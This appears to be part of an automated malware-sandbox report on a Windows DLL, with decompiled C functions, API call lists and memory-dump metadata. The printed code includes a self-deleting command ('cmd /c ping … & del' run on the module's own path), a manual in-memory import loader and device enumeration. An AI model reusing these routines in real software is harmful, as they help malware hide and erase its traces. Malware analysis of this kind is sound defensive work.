                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t32 = E10014C80(_t40, _t44);
                                                                                                                                                                  										__eflags = _t32;
                                                                                                                                                                  										if(_t32 < 0) {
                                                                                                                                                                  											goto L15;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                                  											__eflags = _t33;
                                                                                                                                                                  											if(_t33 != 0) {
                                                                                                                                                                  												goto L15;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												 *0x103352f8 =  *0x103352f8 + 1;
                                                                                                                                                                  												_t22 = 1;
                                                                                                                                                                  												__eflags = 1;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									L10:
                                                                                                                                                                  									E10011620();
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								L8:
                                                                                                                                                                  								E1000F879();
                                                                                                                                                                  								goto L1;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                  						goto L1;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t22 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t22;
                                                                                                                                                                  			}



















                                                                                                                                                                  0x1000ea55
                                                                                                                                                                  0x1000ea5a
                                                                                                                                                                  0x1000ea5c
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x1000ea7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea5e
                                                                                                                                                                  0x1000ea63
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea67
                                                                                                                                                                  0x1000ea69
                                                                                                                                                                  0x1000ea6e
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000ea73
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000eb2c
                                                                                                                                                                  0x1000ea71
                                                                                                                                                                  0x1000ea65
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea4e
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000e9a2
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000eb31

APIs
Memory Dump Source
• Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
• Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
Similarity
• API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
• String ID:
• API String ID: 2870529951-0
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001A2C0() {
    char _v267;
    char _v268;
    char _v531;
    char _v532;
    int _t15;
    void* _t20;

    _v532 = 0;
    E1000CF80(_t20,  &_v531, 0, 0x103);
    _v268 = 0;
    E1000CF80(_t20,  &_v267, 0, 0x103);
    GetModuleFileNameA(0,  &_v532, 0x104);
    E1000CCA3(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
    _t15 = WinExec( &_v268, 0); // executed
    return _t15;
}

APIs
Strings
• cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A31E
Memory Dump Source
• Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
• Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
• Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
• Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
Similarity
• API ID: _memset$ExecFileModuleName_sprintf
• String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
• API String ID: 2874319085-10483710
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E1001A660(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
    struct HINSTANCE__* _v8;
    intOrPtr _v16;
    intOrPtr _v20;
    intOrPtr _v24;
    char _v52;
    char _v53;
    short _v55;
    char _v59;
    char _v63;
    char _v67;
    char _v71;
    char _v72;
    char _v335;
    char _v336;
    signed int _v340;
    void* __ebp;
    intOrPtr _t40;
    void* _t45;
    intOrPtr _t73;

    _t80 = __eflags;
    _t71 = __edi;
    _push(0xffffffff);
    _push(E1002315C);
    _push( *[fs:0x0]);
     *[fs:0x0] = _t73;
    _v340 = 0;
    E10001160( &_v52, __eflags, 0x10025ca1);
    _v8 = 0;
    _v336 = 0;
    E1000CF80(__edi,  &_v335, 0, 0x103);
    GetModuleFileNameA(0,  &_v336, 0x104);
    _t40 = E1001A1D0( &_v336); // executed
    _v24 = _t40;
    _v72 = 0;
    _v71 = 0;
    _v67 = 0;
    _v63 = 0;
    _v59 = 0;
    _v55 = 0;
    _v53 = 0;
    E1000CCA3(_t71,  &_v72, "%d", _v24);
    _v20 = E1001A4E0(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
    _t81 = _v20;
    if(_v20 != 0) {
        E10001AB0( &_v52, _t81, _v20);
        E10001AB0( &_v52, _t81, ".exe");
        _push(_v20);
        E1000CA40(__ebx, _t71, __esi, _t81);
    }
    _t45 = E10001200( &_v52);
    _t82 = _t45;
    if(_t45 == 0) {
        E10001AB0( &_v52, _t82, "baidu.exe");
    }
    E10001110(_a4, _t82,  &_v52);
    _v340 = _v340 | 0x00000001;
    _v8 = 0xffffffff;
    E100011A0( &_v52);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001A6B1
                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
                                                                                                                                                                    • Part of subcall function 1001A1D0: FindClose.KERNEL32(000000FF), ref: 1001A216
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001A705
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
                                                                                                                                                                    • Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
                                                                                                                                                                    • Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
                                                                                                                                                                    • Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFind_sprintf_strlen$CloseErrorFirstFreeHeapLastModuleName___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID: .exe$baidu.exe
                                                                                                                                                                  • API String ID: 3164538923-2273953317
                                                                                                                                                                  • Opcode ID: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
                                                                                                                                                                  • Instruction ID: e55bd592b59adb37ad85060a3931d0354643b17087754827cff962c307c3447c
                                                                                                                                                                  • Opcode Fuzzy Hash: 08d08622395ad553d42a9c19a3d1865530d992bc95af371e2ab3d3718ce9d517
                                                                                                                                                                  • Instruction Fuzzy Hash: 56315BB5C10258ABEB04DBA0ED85FEEB7B4FF09740F400169F519A6281EB746A48CB91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 33%
                                                                                                                                                                  			E100199C0(void* __ebx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				char _v312;
                                                                                                                                                                  				char _v572;
                                                                                                                                                                  				char _v832;
                                                                                                                                                                  				char _v1092;
                                                                                                                                                                  				char _v1352;
                                                                                                                                                                  				char _v1368;
                                                                                                                                                                  				char _v1372;
                                                                                                                                                                  				intOrPtr _v1376;
                                                                                                                                                                  				intOrPtr _v1380;
                                                                                                                                                                  				signed int _v1384;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				intOrPtr _t74;
                                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                                  				void* _t85;
                                                                                                                                                                  				void* _t88;
                                                                                                                                                                  				void* _t91;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  				void* _t97;
                                                                                                                                                                  				void* _t116;
                                                                                                                                                                  				signed int _t150;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  				void* _t168;
                                                                                                                                                                  				void* _t171;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				void* _t177;
                                                                                                                                                                  				void* _t180;
                                                                                                                                                                  				void* _t182;
                                                                                                                                                                  				void* _t183;
                                                                                                                                                                  				void* _t184;
                                                                                                                                                                  				void* _t185;
                                                                                                                                                                  				void* _t186;
                                                                                                                                                                  				intOrPtr _t187;
                                                                                                                                                                  				void* _t188;
                                                                                                                                                                  				void* _t189;
                                                                                                                                                                  				void* _t191;
                                                                                                                                                                  				void* _t193;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t196;
                                                                                                                                                                  				void* _t197;
                                                                                                                                                                  				void* _t199;
                                                                                                                                                                  				void* _t200;
                                                                                                                                                                  				void* _t202;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  
                                                                                                                                                                  				_t116 = __ebx;
                                                                                                                                                                  				 *[fs:0x0] = _t187;
                                                                                                                                                                  				_t188 = _t187 - 0x558;
                                                                                                                                                                  				_v1384 = 0;
                                                                                                                                                                  				_t74 = E100031F0( &_v1368, __eflags);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_v1376 = 0;
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				_v1372 = 0;
                                                                                                                                                                  				__imp__SetupDiGetClassDevsA(0, 0, 0, 6, _t164, _t180,  *[fs:0x0], E1002314A, 0xffffffff); // executed
                                                                                                                                                                  				_v1380 = _t74;
                                                                                                                                                                  				if(_v1380 != 0xffffffff) {
                                                                                                                                                                  					E1000CF80(_t164,  &_v44, 0, 0x1c);
                                                                                                                                                                  					_t189 = _t188 + 0xc;
                                                                                                                                                                  					_v44 = 0x1c;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t148 = _v1376;
                                                                                                                                                                  						_t80 = _v1380;
                                                                                                                                                                  						__imp__SetupDiEnumDeviceInfo(_t80, _v1376,  &_v44);
                                                                                                                                                                  						if(_t80 == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						E1000CF80(_t164,  &_v1352, 0, 0x514);
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0);
                                                                                                                                                                  						_t191 = _t189 + 0xc - 0x1c;
                                                                                                                                                                  						_t182 =  &_v44;
                                                                                                                                                                  						memcpy(_t191, _t182, 7 << 2);
                                                                                                                                                                  						_t168 = _t182 + 0xe;
                                                                                                                                                                  						_push(_v1380); // executed
                                                                                                                                                                  						_t85 = E100197E0(_t116, _t182); // executed
                                                                                                                                                                  						_t193 = _t191 + 0x38;
                                                                                                                                                                  						_t213 = _t85;
                                                                                                                                                                  						if(_t85 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t168, _t182,  &_v1352, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t168, _t182, _t213);
                                                                                                                                                                  							_t193 = _t193 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(7);
                                                                                                                                                                  						_t194 = _t193 - 0x1c;
                                                                                                                                                                  						_t183 =  &_v44;
                                                                                                                                                                  						memcpy(_t194, _t183, 7 << 2);
                                                                                                                                                                  						_t171 = _t183 + 0xe;
                                                                                                                                                                  						_push(_v1380); // executed
                                                                                                                                                                  						_t88 = E100197E0(_t116, _t183); // executed
                                                                                                                                                                  						_t196 = _t194 + 0x38;
                                                                                                                                                                  						_t214 = _t88;
                                                                                                                                                                  						if(_t88 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t171, _t183,  &_v1092, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t171, _t183, _t214);
                                                                                                                                                                  							_t196 = _t196 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0x16);
                                                                                                                                                                  						_t197 = _t196 - 0x1c;
                                                                                                                                                                  						_t184 =  &_v44;
                                                                                                                                                                  						memcpy(_t197, _t184, 7 << 2);
                                                                                                                                                                  						_t174 = _t184 + 0xe;
                                                                                                                                                                  						_push(_v1380); // executed
                                                                                                                                                                  						_t91 = E100197E0(_t116, _t184); // executed
                                                                                                                                                                  						_t199 = _t197 + 0x38;
                                                                                                                                                                  						_t215 = _t91;
                                                                                                                                                                  						if(_t91 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t174, _t184,  &_v832, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t174, _t184, _t215);
                                                                                                                                                                  							_t199 = _t199 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(0xc);
                                                                                                                                                                  						_t200 = _t199 - 0x1c;
                                                                                                                                                                  						_t185 =  &_v44;
                                                                                                                                                                  						memcpy(_t200, _t185, 7 << 2);
                                                                                                                                                                  						_t177 = _t185 + 0xe;
                                                                                                                                                                  						_push(_v1380); // executed
                                                                                                                                                                  						_t94 = E100197E0(_t116, _t185); // executed
                                                                                                                                                                  						_t202 = _t200 + 0x38;
                                                                                                                                                                  						_t216 = _t94;
                                                                                                                                                                  						if(_t94 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t177, _t185,  &_v572, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t177, _t185, _t216);
                                                                                                                                                                  							_t202 = _t202 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( &_v1372);
                                                                                                                                                                  						_push( &_v48);
                                                                                                                                                                  						_push(8);
                                                                                                                                                                  						_t203 = _t202 - 0x1c;
                                                                                                                                                                  						_t186 =  &_v44;
                                                                                                                                                                  						memcpy(_t203, _t186, 7 << 2);
                                                                                                                                                                  						_t164 = _t186 + 0xe;
                                                                                                                                                                  						_push(_v1380); // executed
                                                                                                                                                                  						_t97 = E100197E0(_t116, _t186); // executed
                                                                                                                                                                  						_t189 = _t203 + 0x38;
                                                                                                                                                                  						_t217 = _t97;
                                                                                                                                                                  						if(_t97 != 0) {
                                                                                                                                                                  							E1000D1F0(_t116, _t164, _t186,  &_v312, _v48, _v1372);
                                                                                                                                                                  							_push(_v48);
                                                                                                                                                                  							E1000CA40(_t116, _t164, _t186, _t217);
                                                                                                                                                                  							_t189 = _t189 + 0x10;
                                                                                                                                                                  						}
                                                                                                                                                                  						_v1376 = _v1376 + 1;
                                                                                                                                                                  						E10003390( &_v1368,  &_v1352, _t217,  &_v1352);
                                                                                                                                                                  					}
                                                                                                                                                                  					__imp__SetupDiDestroyDeviceInfoList(_v1380); // executed
                                                                                                                                                                  				}
                                                                                                                                                                  				E10003220(_a4, _t148, __eflags,  &_v1368);
                                                                                                                                                                  				_t150 = _v1384 | 0x00000001;
                                                                                                                                                                  				__eflags = _t150;
                                                                                                                                                                  				_v1384 = _t150;
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E10003300( &_v1368); // executed
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}




















































                                                                                                                                                                  0x10019be4
                                                                                                                                                                  0x10019be6
                                                                                                                                                                  0x10019bee
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bf3
                                                                                                                                                                  0x10019bfb
                                                                                                                                                                  0x10019bfc
                                                                                                                                                                  0x10019c01
                                                                                                                                                                  0x10019c04
                                                                                                                                                                  0x10019c06
                                                                                                                                                                  0x10019c1a
                                                                                                                                                                  0x10019c25
                                                                                                                                                                  0x10019c26
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c2b
                                                                                                                                                                  0x10019c37
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c4a
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c5b
                                                                                                                                                                  0x10019c6b
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c76
                                                                                                                                                                  0x10019c79
                                                                                                                                                                  0x10019c7f
                                                                                                                                                                  0x10019c8c
                                                                                                                                                                  0x10019c97
                                                                                                                                                                  0x10019ca3

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetupDiGetClassDevsA.SETUPAPI(00000000,00000000,00000000,00000006), ref: 10019A1F
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A40
                                                                                                                                                                  • SetupDiEnumDeviceInfo.SETUPAPI(000000FF,00000000,0000001C), ref: 10019A61
                                                                                                                                                                  • _memset.LIBCMT ref: 10019A7D
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,?,00000000,00000000,00000000,?), ref: 1001980C
                                                                                                                                                                    • Part of subcall function 100197E0: GetLastError.KERNEL32 ref: 10019812
                                                                                                                                                                    • Part of subcall function 100197E0: _memset.LIBCMT ref: 1001983E
                                                                                                                                                                    • Part of subcall function 100197E0: SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,?,00000000,00000000,?,?,00000000), ref: 10019864
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
                                                                                                                                                                    • Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
                                                                                                                                                                    • Part of subcall function 1000CA40: RtlFreeHeap.NTDLL(00000000,?,103314D0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
                                                                                                                                                                    • Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103314D0), ref: 1000CAB9
                                                                                                                                                                  • SetupDiDestroyDeviceInfoList.SETUPAPI(000000FF), ref: 10019C5B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Setup$Device$_memset$ErrorInfoLastPropertyRegistry$ClassDestroyDevsEnumFreeHeapList___sbh_find_block___sbh_free_block
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3323326763-0
                                                                                                                                                                  • Opcode ID: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
                                                                                                                                                                  • Instruction ID: feca0670d641fe6b0cb65ea07884cbe10e98eaee29bba7d3bd3bbacfe8845874
                                                                                                                                                                  • Opcode Fuzzy Hash: f8c89a6727fd7a968aa7c8f84d6bdcaed2ad53855714dbc5a262361878d3537d
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81A5B6D006189BDB14DBA8DC51FEF7378EB48315F048198E509B7281EB35AA85CFA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                                                  			E1001ABC0(intOrPtr* _a4) {
                                                                                                                                                                  				void* _v8;
                                                                                                                                                                  				intOrPtr* _v12;
                                                                                                                                                                  				void* _v16;
                                                                                                                                                                  				intOrPtr _v20;
                                                                                                                                                                  				void* _v24;
                                                                                                                                                                  				void* _v28;
                                                                                                                                                                  				signed int* _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				void* _t108;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				void* _t115;
                                                                                                                                                                  				void* _t122;
                                                                                                                                                                  				void* _t130;
                                                                                                                                                                  				void _t132;
                                                                                                                                                                  				void _t137;
                                                                                                                                                                  				void* _t144;
                                                                                                                                                                  				void* _t159;
                                                                                                                                                                  				void* _t194;
                                                                                                                                                                  				void* _t201;
                                                                                                                                                                  				void* _t202;
                                                                                                                                                                  				void* _t203;
                                                                                                                                                                  				void* _t204;
                                                                                                                                                                  
                                                                                                                                                                  				_t2 = _a4 + 4; // 0xe90575c0
                                                                                                                                                                  				_v20 =  *_t2;
                                                                                                                                                                  				_v16 = 1;
                                                                                                                                                                  				_v12 =  *_a4 + 0x80;
                                                                                                                                                                  				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                                  					_v8 = _v20 +  *_v12;
                                                                                                                                                                  					while(1) {
                                                                                                                                                                  						_t108 = IsBadReadPtr(_v8, 0x14);
                                                                                                                                                                  						__eflags = _t108;
                                                                                                                                                                  						if(_t108 != 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t110 = _v8;
                                                                                                                                                                  						__eflags =  *(_t110 + 0xc);
                                                                                                                                                                  						if( *(_t110 + 0xc) == 0) {
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t18 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  						_t23 = _a4 + 0x24; // 0xf3c7e850, executed
                                                                                                                                                                  						_t113 =  *((intOrPtr*)( *_t23))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *_t18); // executed
                                                                                                                                                                  						_t204 = _t203 + 8;
                                                                                                                                                                  						_v36 = _t113;
                                                                                                                                                                  						__eflags = _v36;
                                                                                                                                                                  						if(__eflags != 0) {
                                                                                                                                                                  							_t28 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  							_push(4 +  *_t28 * 4);
                                                                                                                                                                  							_t32 = _a4 + 8; // 0x98
                                                                                                                                                                  							_push( *_t32);
                                                                                                                                                                  							_t115 = E1000E078(_t144,  *_t32, _t201, _t202, __eflags);
                                                                                                                                                                  							_t203 = _t204 + 8;
                                                                                                                                                                  							_v28 = _t115;
                                                                                                                                                                  							__eflags = _v28;
                                                                                                                                                                  							if(_v28 != 0) {
                                                                                                                                                                  								 *(_a4 + 8) = _v28;
                                                                                                                                                                  								_t45 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  								_t47 = _a4 + 8; // 0x98
                                                                                                                                                                  								 *((intOrPtr*)( *_t47 +  *_t45 * 4)) = _v36;
                                                                                                                                                                  								_t52 = _a4 + 0xc; // 0x52b8558b
                                                                                                                                                                  								 *(_a4 + 0xc) =  *_t52 + 1;
                                                                                                                                                                  								__eflags =  *_v8;
                                                                                                                                                                  								if( *_v8 == 0) {
                                                                                                                                                                  									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  									_t122 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  									__eflags = _t122;
                                                                                                                                                                  									_v24 = _t122;
                                                                                                                                                                  								} else {
                                                                                                                                                                  									_v32 = _v20 +  *_v8;
                                                                                                                                                                  									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                  								}
                                                                                                                                                                  								while(1) {
                                                                                                                                                                  									__eflags =  *_v32;
                                                                                                                                                                  									if( *_v32 == 0) {
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *_v32 & 0x80000000;
                                                                                                                                                                  									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                                  										_v40 = _v20 +  *_v32;
                                                                                                                                                                  										_t88 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  										_t130 = _v40 + 2;
                                                                                                                                                                  										__eflags = _t130;
                                                                                                                                                                  										_t92 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                  										_t132 =  *((intOrPtr*)( *_t92))(_v36, _t130,  *_t88);
                                                                                                                                                                  										_t203 = _t203 + 0xc;
                                                                                                                                                                  										 *_v24 = _t132;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t78 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  										_t82 = _a4 + 0x28; // 0xc483ffff
                                                                                                                                                                  										_t137 =  *((intOrPtr*)( *_t82))(_v36,  *_v32 & 0x0000ffff,  *_t78);
                                                                                                                                                                  										_t203 = _t203 + 0xc;
                                                                                                                                                                  										 *_v24 = _t137;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags =  *_v24;
                                                                                                                                                                  									if( *_v24 != 0) {
                                                                                                                                                                  										_v32 =  &(_v32[1]);
                                                                                                                                                                  										_t194 = _v24 + 4;
                                                                                                                                                                  										__eflags = _t194;
                                                                                                                                                                  										_v24 = _t194;
                                                                                                                                                                  										continue;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_v16 = 0;
                                                                                                                                                                  										break;
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  								__eflags = _v16;
                                                                                                                                                                  								if(_v16 != 0) {
                                                                                                                                                                  									_t159 = _v8 + 0x14;
                                                                                                                                                                  									__eflags = _t159;
                                                                                                                                                                  									_v8 = _t159;
                                                                                                                                                                  									continue;
                                                                                                                                                                  								}
                                                                                                                                                                  								_t98 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  								_t101 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                  								 *((intOrPtr*)( *_t101))(_v36,  *_t98);
                                                                                                                                                                  								SetLastError(0x7f);
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t36 = _a4 + 0x34; // 0x118bb84d
                                                                                                                                                                  							_t39 = _a4 + 0x2c; // 0x75c08504
                                                                                                                                                                  							 *((intOrPtr*)( *_t39))(_v36,  *_t36);
                                                                                                                                                                  							SetLastError(0xe);
                                                                                                                                                                  							_v16 = 0;
                                                                                                                                                                  							break;
                                                                                                                                                                  						}
                                                                                                                                                                  						SetLastError(0x7e);
                                                                                                                                                                  						_v16 = 0;
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					return _v16;
                                                                                                                                                                  				}
                                                                                                                                                                  				return 1;
                                                                                                                                                                  			}





























